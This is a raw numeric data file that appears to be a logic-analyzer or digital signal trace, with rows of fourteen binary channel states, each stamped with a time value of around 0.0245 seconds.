0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4539636e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539660e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4539684e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539708e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4539732e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539756e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4539784e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539808e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4539836e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539856e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.4539864e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4539868e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4539884e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4539908e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,2.4539912e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539916e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4539932e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4539956e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4539964e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4539984e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540008e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4540036e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540056e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4540084e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540108e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4540132e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540156e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4540164e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4540184e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4540208e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.4540212e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540216e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4540236e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540256e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,2.4540260e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4540264e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4540284e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4540308e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540316e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4540332e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540356e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4540384e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540408e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4540436e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540456e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4540484e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540508e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,2.4540512e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4540516e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4540532e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4540556e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540564e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4540584e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540608e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4540636e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540656e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,2.4540660e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4540664e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4540684e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4540708e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4540732e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4540756e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4540784e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4540808e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4540836e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4540856e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.4540864e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540868e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4540884e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540908e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4540932e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4540956e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4540964e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4540984e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4541008e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.4541012e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541016e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541036e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541056e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541084e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541108e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541132e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541156e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541184e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541208e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4541212e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4541236e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4541256e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,2.4541264e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541268e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541284e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541308e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541332e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541356e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541384e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541408e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541436e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541460e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541484e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541508e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541532e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541556e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541584e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541608e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541636e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541660e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541684e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541708e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541756e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541784e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541808e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541836e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541860e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541884e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541908e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541932e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4541956e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4541984e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4542008e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4542036e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4542060e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4542084e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4542108e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4666804e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4667040e-02 1,1,0,1,0,0,0,0,0,0,0,1,0,1,2.4667068e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4667096e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.4667384e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4667408e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.4667436e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4667460e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.4667484e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4667508e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.4667532e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4667556e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.4667584e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4667608e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,2.4667628e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4667636e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4667660e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4667684e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4667708e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4667732e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4667756e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4667784e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4667804e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4667832e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4667856e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4667884e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4667908e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4667932e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4667956e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4667984e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668004e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668028e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668056e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668084e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668108e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668132e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668156e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668184e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668204e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668228e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668256e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668284e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668308e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668332e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668356e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668380e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668404e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668432e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668456e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668484e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668508e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668532e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668556e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668580e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668604e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668632e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668656e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668684e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668708e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4668732e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4668756e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4668760e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4668780e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4668804e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4668832e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4668856e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4668884e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4668908e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4668932e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4668956e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4668980e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4669004e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4669032e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4669056e-02 1,1,0,1,0,1,0,0,0,0,0,0,0,0,2.4669060e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669064e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669084e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669108e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669132e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669156e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669180e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669204e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669232e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669256e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669284e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669308e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669332e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669356e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669384e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669404e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669428e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669456e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669484e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669508e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669532e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669556e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669584e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669604e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669632e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669656e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669684e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669708e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669732e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669756e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669784e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669804e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669832e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669856e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669884e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669908e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669932e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4669956e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4669984e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670004e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670032e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670056e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670084e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670108e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670132e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670156e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4670160e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4670184e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4670208e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4670232e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4670260e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4670284e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4670308e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4670332e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4670356e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4670384e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4670408e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,2.4670432e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,2.4670456e-02 1,1,0,1,0,1,0,0,0,0,0,0,0,0,2.4670460e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670464e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670484e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670508e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670532e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670556e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670580e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670604e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670628e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670656e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670684e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670708e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670732e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670756e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670780e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670804e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670832e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670856e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670884e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670908e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670932e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4670956e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4670980e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671004e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671032e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671056e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671084e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671108e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671132e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671156e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671180e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671204e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671232e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671256e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671284e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671308e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671332e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671356e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671380e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671404e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671432e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671456e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671484e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671508e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671532e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671556e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671580e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671604e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671632e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671656e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671680e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671708e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671732e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671756e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671780e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671804e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671828e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671856e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671884e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671908e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671932e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4671956e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4671980e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672004e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672032e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672056e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672084e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672108e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672132e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672156e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672180e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672204e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672232e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672256e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672284e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672308e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672332e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672356e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672380e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672404e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672432e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672456e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672484e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672508e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672532e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672556e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672580e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672604e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672632e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672656e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672684e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672708e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672732e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672756e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672780e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672804e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672828e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672852e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672876e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672904e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672928e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4672956e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4672980e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673004e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673028e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673052e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673076e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673104e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673128e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673156e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673180e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673204e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673228e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673252e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673276e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673304e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673328e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673356e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673380e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673404e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673428e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673452e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673476e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673504e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673528e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673556e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673580e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673604e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673628e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673656e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673684e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673708e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,2.4673732e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,2.4673756e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,2.4798708e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,2.4798908e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.4798928e-02 0,0,1,1,0,0,0,0,0,0,0,1,0,1,2.4798960e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.4798988e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.4799300e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.4799324e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.4799352e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.4799376e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.4799404e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.4799428e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.4799452e-02 0,0,1,1,0,0,0,0,0,0,0,0,0,1,2.4799476e-02 0,0,1,1,0,0,0,0,0,0,0,0,1,1,2.4799500e-02 